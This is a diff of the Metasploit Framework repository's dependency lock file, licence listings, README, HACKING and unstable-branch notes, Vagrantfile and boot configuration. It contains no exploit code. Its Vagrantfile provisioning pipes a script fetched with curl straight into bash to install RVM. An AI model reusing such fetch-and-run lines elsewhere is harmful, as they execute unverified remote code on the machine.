+    rex-random_identifier (0.1.0)
       rex-text
-    rex-registry (0.1.3)
-    rex-rop_builder (0.1.3)
-      metasm
-      rex-core
+    rex-registry (0.1.0)
+    rex-struct2 (0.1.0)
+    rex-text (0.1.1)
+    rex-zip (0.1.0)
       rex-text
-    rex-socket (0.1.22)
-      rex-core
-    rex-sslscan (0.1.5)
-      rex-core
-      rex-socket
-      rex-text
-    rex-struct2 (0.1.2)
-    rex-text (0.2.24)
-    rex-zip (0.1.3)
-      rex-text
-    rexml (3.2.4)
-    rkelly-remix (0.0.7)
-    rspec (3.9.0)
-      rspec-core (~> 3.9.0)
-      rspec-expectations (~> 3.9.0)
-      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.1)
-      rspec-support (~> 3.9.1)
-    rspec-expectations (3.9.0)
+    rkelly-remix (0.0.6)
+    robots (0.10.1)
+    rspec-core (3.5.1)
+      rspec-support (~> 3.5.0)
+    rspec-expectations (3.5.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.1)
+      rspec-support (~> 3.5.0)
+    rspec-mocks (3.5.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.9.0)
-    rspec-rails (3.9.1)
+      rspec-support (~> 3.5.0)
+    rspec-rails (3.5.1)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.9.0)
-      rspec-expectations (~> 3.9.0)
-      rspec-mocks (~> 3.9.0)
-      rspec-support (~> 3.9.0)
-    rspec-rerun (1.1.0)
-      rspec (~> 3.0)
-    rspec-support (3.9.2)
-    rubocop (0.80.1)
-      jaro_winkler (~> 1.5.1)
-      parallel (~> 1.10)
-      parser (>= 2.7.0.1)
-      rainbow (>= 2.2.2, < 4.0)
-      rexml
-      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 1.7)
-    ruby-macho (2.2.0)
-    ruby-prof (1.3.0)
-    ruby-progressbar (1.10.1)
-    ruby-rc4 (0.1.5)
-    ruby_smb (1.1.0)
-      bindata
-      rubyntlm
-      windows_error
-    rubyntlm (0.6.2)
-    rubyzip (2.2.0)
-    sawyer (0.8.2)
-      addressable (>= 2.3.5)
-      faraday (> 0.8, < 2.0)
-    simplecov (0.18.2)
-      docile (~> 1.1)
-      simplecov-html (~> 0.11)
-    simplecov-html (0.12.2)
-    sinatra (1.4.8)
-      rack (~> 1.5)
-      rack-protection (~> 1.4)
-      tilt (>= 1.3, < 3)
-    sqlite3 (1.3.13)
-    sshkey (2.0.0)
-    swagger-blocks (3.0.0)
-    thin (1.7.2)
-      daemons (~> 1.0, >= 1.0.9)
-      eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    thor (1.0.1)
-    thread_safe (0.3.6)
-    tilt (2.0.10)
-    timecop (0.9.1)
-    ttfunk (1.6.2.1)
-    tzinfo (1.2.6)
+      rspec-core (~> 3.5.0)
+      rspec-expectations (~> 3.5.0)
+      rspec-mocks (~> 3.5.0)
+      rspec-support (~> 3.5.0)
+    rspec-support (3.5.0)
+    rubyntlm (0.6.0)
+    rubyzip (1.2.0)
+    sawyer (0.7.0)
+      addressable (>= 2.3.5, < 2.5)
+      faraday (~> 0.8, < 0.10)
+    shoulda-matchers (3.1.1)
+      activesupport (>= 4.0.0)
+    simplecov (0.12.0)
+      docile (~> 1.1.0)
+      json (>= 1.8, < 3)
+      simplecov-html (~> 0.10.0)
+    simplecov-html (0.10.0)
+    slop (3.6.0)
+    sqlite3 (1.3.11)
+    sshkey (1.8.0)
+    thor (0.19.1)
+    thread_safe (0.3.5)
+    timecop (0.8.1)
+    tzinfo (1.2.2)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2019.3)
+    tzinfo-data (1.2016.6)
       tzinfo (>= 1.0.0)
-    unicode-display_width (1.6.1)
-    warden (1.2.7)
-      rack (>= 1.0)
-    websocket-driver (0.7.1)
-      websocket-extensions (>= 0.1.0)
-    websocket-extensions (0.1.4)
-    windows_error (0.1.2)
-    xdr (2.0.0)
-      activemodel (>= 4.2.7)
-      activesupport (>= 4.2.7)
-    xmlrpc (0.3.0)
-    yard (0.9.24)
+    xpath (2.0.0)
+      nokogiri (~> 1.3)
+    yard (0.9.0)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  factory_bot_rails
+  aruba
+  cucumber-rails
+  factory_girl_rails
   fivemat
-  memory_profiler
   metasploit-framework!
-  octokit
-  pry-byebug
+  octokit (~> 4.0)
+  pry
   rake
   redcarpet
   rspec-rails
-  rspec-rerun
-  rubocop
-  ruby-prof
-  simplecov (= 0.18.2)
-  sqlite3 (~> 1.3.0)
-  swagger-blocks
+  shoulda-matchers
+  simplecov
   timecop
   yard
 
 BUNDLED WITH
-   1.17.3
+   1.12.5

HACKING

@@ -0,0 +1,38 @@
+HACKING
+=======
+
+(Last updated: 2014-03-04)
+
+This document almost entirely deprecated by:
+
+CONTRIBUTING.md
+
+in the same directory as this file, and to a lesser extent:
+
+The Metasploit Development Environment
+https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
+
+Common Coding Mistakes
+https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+
+The Ruby Style Guide
+https://github.com/bbatsov/ruby-style-guide
+
+Ruby 1.9: What to Expect
+http://slideshow.rubyforge.org/ruby19.html
+
+You can use the the "./tools/msftidy.rb" script against your new and
+changed modules to do some rudimentary checking for various style and
+syntax violations.
+
+Licensing for Your New Content
+==============================
+
+By submitting code contributions to the Metasploit Project it is
+assumed that you are offering your code under the Metasploit License
+or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
+are also fine.  We specifically cannot include GPL code. LGPL code
+is accepted on a case by case basis for libraries only and is never
+accepted for modules.
+
+

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2016, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,15 +15,23 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
-Files: data/exploits/mysql/lib_mysqludf_sys_*.so
-Copyright: 2007  Roland Bouman
-           2008-2010  Roland Bouman and Bernardo Damele A. G.
-License: LGPL-2.1
-
 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause
 
+Files: data/john/*
+Copyright: 1996-2011 Solar Designer.
+License: GPL-2
+
+Files: external/pcaprub/*
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: external/ruby-kissfft/*
+Copyright: 2003-2010 Mark Borgerding
+           2009-2012 H D Moore <hdm[at]rapid7.com>
+License: BSD-3-clause
+
 Files: external/source/exploits/IE11SandboxEscapes/*
 Copyright: James Forshaw, 2014
 License: GPLv3
@@ -71,22 +79,38 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
-Files: lib/expect.rb
-Copyright: 2017 Yukihiro Matsumoto
+Files: lib/bit-struct.rb lib/bit-struct/*
+Copyright: 2005-2009, Joel VanderWerf
 License: Ruby
 
-Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
-License: Apache 2.0
+Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
+Copyright: 2006-2010 Yoann GUILLOT
+License: LGPL-2.1
+
+Files: lib/nessus/*
+Copyright: Vlatoko Kosturjak
+License: BSD-3-clause
 
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby
 
+Files: lib/net/ssh.rb lib/net/ssh/*
+Copyright: 2008 Jamis Buck <jamis@37signals.com>
+License: MIT
+
+Files: lib/packetfu.rb lib/packetfu/*
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby
 
+Files: lib/openvas/*
+Copyright: No copyright statement provided
+License: MIT
+
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -95,10 +119,22 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby
 
+Files: lib/rbreadline.rb
+Copyright: 2009 Park Heesob
+License: BSD-3-clause
+
+Files: lib/rkelly/*
+Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
+License: MIT
+
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby
 
+Files: lib/sshkey.rb lib/sshkey/*
+Copyright: 2011 James Miller
+License: MIT
+
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -115,13 +151,131 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT
 
-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
 
-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: bcrypt
+Copyright: 2007-2011 Coda Hale
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
 
 License: BSD-2-clause
  Redistribution and use in source and binary forms, with or without modification,
@@ -611,54 +765,6 @@ License: Artistic
  DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
  ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
-License: Apache
- Version 1.1, 2000
- Modifications by CORE Security Technologies
- .
- Copyright (c) 2000 The Apache Software Foundation.  All rights
- reserved.
- .
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions
- are met:
- .
- 1. Redistributions of source code must retain the above copyright
-    notice, this list of conditions and the following disclaimer.
- .
- 2. Redistributions in binary form must reproduce the above copyright
-    notice, this list of conditions and the following disclaimer in
-    the documentation and/or other materials provided with the
-    distribution.
- .
- 3. The end-user documentation included with the redistribution,
-    if any, must include the following acknowledgment:
-       "This product includes software developed by
-        CORE Security Technologies (http://www.coresecurity.com/)."
-    Alternately, this acknowledgment may appear in the software itself,
-    if and wherever such third-party acknowledgments normally appear.
- .
- 4. The names "Impacket" and "CORE Security Technologies" must
-    not be used to endorse or promote products derived from this
-    software without prior written permission. For written
-    permission, please contact oss@coresecurity.com.
- .
- 5. Products derived from this software may not be called "Impacket",
-    nor may "Impacket" appear in their name, without prior written
-    permission of CORE Security Technologies.
- .
- THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
- WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
- ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
- USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
- OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- SUCH DAMAGE.
-
 License: Apache
  Version 2.0, January 2004
  http://www.apache.org/licenses/

LICENSE_GEMS

@@ -1,159 +0,0 @@
-This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.3, MIT
-actionpack, 4.2.11.1, MIT
-actionview, 4.2.11.1, MIT
-activemodel, 4.2.11.1, MIT
-activerecord, 4.2.11.1, MIT
-activesupport, 4.2.11.1, MIT
-addressable, 2.7.0, "Apache 2.0"
-afm, 0.2.2, MIT
-arel, 6.0.4, MIT
-arel-helpers, 2.11.0, MIT
-ast, 2.4.0, MIT
-aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.281.0, "Apache 2.0"
-aws-sdk-core, 3.91.0, "Apache 2.0"
-aws-sdk-ec2, 1.149.0, "Apache 2.0"
-aws-sdk-iam, 1.34.0, "Apache 2.0"
-aws-sdk-kms, 1.30.0, "Apache 2.0"
-aws-sdk-s3, 1.61.0, "Apache 2.0"
-aws-sigv4, 1.1.1, "Apache 2.0"
-bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.6, ruby
-bit-struct, 0.16, ruby
-builder, 3.2.4, MIT
-bundler, 1.17.3, MIT
-byebug, 11.1.1, "Simplified BSD"
-coderay, 1.1.2, MIT
-concurrent-ruby, 1.0.5, MIT
-cookiejar, 0.3.3, unknown
-crass, 1.0.6, MIT
-daemons, 1.3.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.3, "Apache 2.0"
-docile, 1.3.2, MIT
-ed25519, 1.2.4, MIT
-em-http-request, 1.1.5, MIT
-em-socksify, 0.3.2, MIT
-erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.1.1, MIT
-factory_bot_rails, 5.1.1, MIT
-faker, 2.2.1, MIT
-faraday, 0.17.0, MIT
-faye-websocket, 0.10.9, "Apache 2.0"
-filesize, 0.2.0, MIT
-fivemat, 1.3.7, MIT
-hashery, 2.1.2, "Simplified BSD"
-hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
-http_parser.rb, 0.6.0, MIT
-i18n, 0.9.5, MIT
-jaro_winkler, 1.5.4, MIT
-jmespath, 1.4.0, "Apache 2.0"
-jsobfu, 0.4.2, "New BSD"
-json, 2.3.0, ruby
-loofah, 2.4.0, MIT
-metasm, 1.0.4, LGPL-2.1
-metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.81, "New BSD"
-metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.86, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.19, "3-clause (or ""modified"") BSD"
-method_source, 0.9.2, MIT
-mini_portile2, 2.4.0, MIT
-minitest, 5.14.0, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.3.3, "Apache 2.0"
-multipart-post, 2.1.1, MIT
-nessus_rest, 0.1.6, MIT
-net-ssh, 5.2.0, MIT
-network_interface, 0.0.2, MIT
-nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.9, MIT
-octokit, 4.17.0, MIT
-openssl-ccm, 1.2.2, MIT
-openvas-omp, 0.0.4, MIT
-packetfu, 1.1.13, BSD
-parallel, 1.19.1, MIT
-parser, 2.7.0.4, MIT
-patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.4.0, MIT
-pg, 0.21.0, "New BSD"
-pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.1, MIT
-pry, 0.12.2, MIT
-pry-byebug, 3.8.0, MIT
-public_suffix, 4.0.3, MIT
-rack, 1.6.13, MIT
-rack-protection, 1.5.5, MIT
-rack-test, 0.6.3, MIT
-rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.3.0, MIT
-railties, 4.2.11.1, MIT
-rainbow, 3.0.0, MIT
-rake, 13.0.1, MIT
-rb-readline, 0.5.5, BSD
-recog, 2.3.7, unknown
-redcarpet, 3.5.0, MIT
-rex-arch, 0.1.13, "New BSD"
-rex-bin_tools, 0.1.6, "New BSD"
-rex-core, 0.1.13, "New BSD"
-rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.22, "New BSD"
-rex-java, 0.1.5, "New BSD"
-rex-mime, 0.1.5, "New BSD"
-rex-nop, 0.1.1, "New BSD"
-rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.87, "New BSD"
-rex-random_identifier, 0.1.4, "New BSD"
-rex-registry, 0.1.3, "New BSD"
-rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.22, "New BSD"
-rex-sslscan, 0.1.5, "New BSD"
-rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.24, "New BSD"
-rex-zip, 0.1.3, "New BSD"
-rexml, 3.2.4, "Simplified BSD"
-rkelly-remix, 0.0.7, MIT
-rspec, 3.9.0, MIT
-rspec-core, 3.9.1, MIT
-rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.1, MIT
-rspec-rails, 3.9.1, MIT
-rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.2, MIT
-rubocop, 0.80.1, MIT
-ruby-macho, 2.2.0, MIT
-ruby-progressbar, 1.10.1, MIT
-ruby-rc4, 0.1.5, MIT
-ruby_smb, 1.1.0, "New BSD"
-rubyntlm, 0.6.2, MIT
-rubyzip, 2.2.0, "Simplified BSD"
-sawyer, 0.8.2, MIT
-simplecov, 0.18.2, MIT
-simplecov-html, 0.12.2, MIT
-sinatra, 1.4.8, MIT
-sqlite3, 1.3.13, "New BSD"
-sshkey, 2.0.0, MIT
-swagger-blocks, 3.0.0, MIT
-thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 1.0.1, MIT
-thread_safe, 0.3.6, "Apache 2.0"
-tilt, 2.0.10, MIT
-timecop, 0.9.1, MIT
-ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.6, MIT
-tzinfo-data, 1.2019.3, MIT
-unicode-display_width, 1.6.1, MIT
-warden, 1.2.7, MIT
-websocket-driver, 0.7.1, "Apache 2.0"
-websocket-extensions, 0.1.4, "Apache 2.0"
-windows_error, 0.1.2, BSD
-xdr, 2.0.0, "Apache 2.0"
-xmlrpc, 0.3.0, ruby
-yard, 0.9.24, MIT

README.md

@@ -1,7 +1,7 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+COPYING for more details.
 
 The latest version of this software is available from: https://metasploit.com
 
@@ -9,19 +9,20 @@ Bug tracking and development information can be found at:
  https://github.com/rapid7/metasploit-framework
 
 New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+  http://r-7.co/MSF-BUGv1
 
 API documentation for writing modules can be found at:
   https://rapid7.github.io/metasploit-framework/api
 
-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+Questions and suggestions can be sent to:
+  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
 
 Installing
 --
 
-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://www.metasploit.com/download),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.
 
 Using Metasploit
@@ -44,6 +45,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
 
 

README.unstable

@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+

Rakefile

@@ -9,20 +9,6 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie
 
-begin
-  require 'rspec/core'
-  require 'rspec-rerun/tasks'
-rescue LoadError
-  puts "rspec not in bundle, so can't set up spec tasks.  " \
-       "To run specs ensure to install the development and test groups."
-  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
-  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
-       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
-else
-  require 'rspec/core/rake_task'
-  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
-end
-
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task

Vagrantfile

@@ -3,7 +3,10 @@
 
 Vagrant.configure(2) do |config|
   config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/xenial64"
+  config.vm.box = "ubuntu/trusty64"
+  # TODO: find a minimal image that keeps up-to-date and
+  # supports multiple providers
+  #config.vm.box = "phusion/ubuntu-14.04-amd64"
   config.vm.network :forwarded_port, guest: 4444, host: 4444
   config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -23,14 +26,15 @@ Vagrant.configure(2) do |config|
   [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
     "apt-get update",
     "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
   ].each do |step|
     config.vm.provision "shell", inline: step
   end
 
-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
     "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
     "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
     "mkdir -p ~/.msf4",
   ].each do |step|

config/application.rb

@@ -1,4 +1,3 @@
-require File.expand_path('../rails_bigdecimal_fix', __FILE__)
 require 'rails'
 require File.expand_path('../boot', __FILE__)
 

config/boot.rb

@@ -9,8 +9,6 @@ GEMFILE_EXTENSIONS = [
 msfenv_real_pathname = Pathname.new(__FILE__).realpath
 root = msfenv_real_pathname.parent.parent
 
-require File.expand_path('../rails_bigdecimal_fix', __FILE__)
-
 unless ENV['BUNDLE_GEMFILE']
   require 'pathname'
 
@@ -26,12 +24,9 @@ end
 
 begin
   require 'bundler/setup'
-rescue LoadError => e
-  $stderr.puts "[*] Bundler failed to load and returned this error:"
-  $stderr.puts
-  $stderr.puts "   '#{e}'"
-  $stderr.puts
-  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
+rescue LoadError
+  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
+  $stderr.puts "    $ gem install bundler"
   exit(1)
 end
 

config/database.yml.travis

@@ -14,7 +14,7 @@ development: &pgsql
   adapter: postgresql
   database: metasploit_framework_development
   username: postgres
-  pool: 25
+  pool: 5
   timeout: 5
 
 # Warning: The database defined as "test" will be erased and

config/rails_bigdecimal_fix.rb

@@ -1,11 +0,0 @@
-# Remove bigdecimal warning - start
-# https://github.com/ruby/bigdecimal/pull/115
-# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
-# TODO: remove when upgrading from rails 4.x
-require 'bigdecimal'
-
-def BigDecimal.new(*args, **kwargs)
-  return BigDecimal(*args) if kwargs.empty?
-  BigDecimal(*args, **kwargs)
-end
-# Remove bigdecimal warning - end

data/cpuinfo/build.sh

@@ -0,0 +1,11 @@
+#!/bin/sh
+
+gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
+strip cpuinfo.ia32.bin && \
+gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
+strip cpuinfo.ia64.bin && \
+i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
+strip cpuinfo.exe
+
+ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
+

data/cpuinfo/cpuinfo.c

@@ -0,0 +1,64 @@
+// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
+
+/*
+#!/usr/bin/env ruby
+#    This file is part of Metasm, the Ruby assembly manipulation suite
+#    Copyright (C) 2006-2009 Yoann GUILLOT
+#
+#    Licence is LGPL, see LICENCE in the top-level directory
+
+
+#
+# this sample shows the compilation of a slightly more complex program
+# it displays in a messagebox the result of CPUID
+#
+
+*/
+
+#include <unistd.h>
+#include <stdio.h>
+
+static char *featureinfo[32] = {
+	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
+	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
+	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
+	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
+}, *extendinfo[32] = {
